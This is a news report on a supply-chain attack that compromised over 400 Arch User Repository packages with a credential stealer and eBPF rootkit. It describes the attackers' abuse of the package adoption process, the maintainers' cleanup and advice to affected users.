A supply-chain attack compromised more than 400 Arch Linux AUR packages, deploying a credential stealer and eBPF rootkit.
More than 400 packages hosted on the Arch User Repository (AUR) were compromised in a large-scale supply-chain attack that distributed credential-stealing malware to Linux users, prompting an ongoing cleanup effort across the Arch Linux community.
The incident came to light on June 11 after maintainers and security researchers discovered malicious modifications embedded within hundreds of community-maintained packages. The affected packages were hosted on the AUR, Arch Linux’s user-driven software repository, and did not involve the project’s official software repositories.
According to researchers, the attackers exploited the AUR’s package adoption process by taking control of abandoned or orphaned packages. Once in control, they altered package build scripts so that malware would be downloaded and executed during installation.
The malicious payload was designed to collect sensitive information from infected systems, including credentials, authentication tokens, and developer-related secrets. Investigators said the malware was written in Rust and, when executed with root privileges, could also install an eBPF-based rootkit intended to conceal its presence on compromised machines.
Rather than exploiting a software vulnerability, the campaign abused trust in widely used community packages. The compromised packages retained their original names and histories, making the malicious changes difficult to spot during routine updates.
Arch Linux maintainers responded by removing malicious package revisions, banning accounts connected to the activity, and auditing affected packages. Community members have continued reviewing the repository as additional compromised packages are identified.
The attack has been described as one of the most significant security incidents to affect the AUR ecosystem. While more than 400 packages had been confirmed compromised as of June 12, researchers warned that the final number could increase as the investigation progresses.
Users who installed or updated AUR packages on or after June 11 are being urged to review affected package lists, rotate passwords and access tokens, and inspect systems for signs of compromise. Security experts also recommend treating potentially affected machines as untrusted until they can be thoroughly examined.
The investigation remains active as researchers work to determine the full scope of the campaign and assess the long-term impact on Arch Linux users and downstream distributions that rely on AUR packages.
Related articles :
- Coruna iOS Exploit Kit Reuses Triangulation Zero-Days
- Interview with Pentester Cyberjagu
- Critical GitHub Enterprise Flaw Exposes Servers
Reports are sourced from official documents, law-enforcement updates, and credible investigations.
Discover additional reports, market trends, crime analysis and Harm Reduction articles on DarkDotWeb to stay informed about the latest dark web operations.
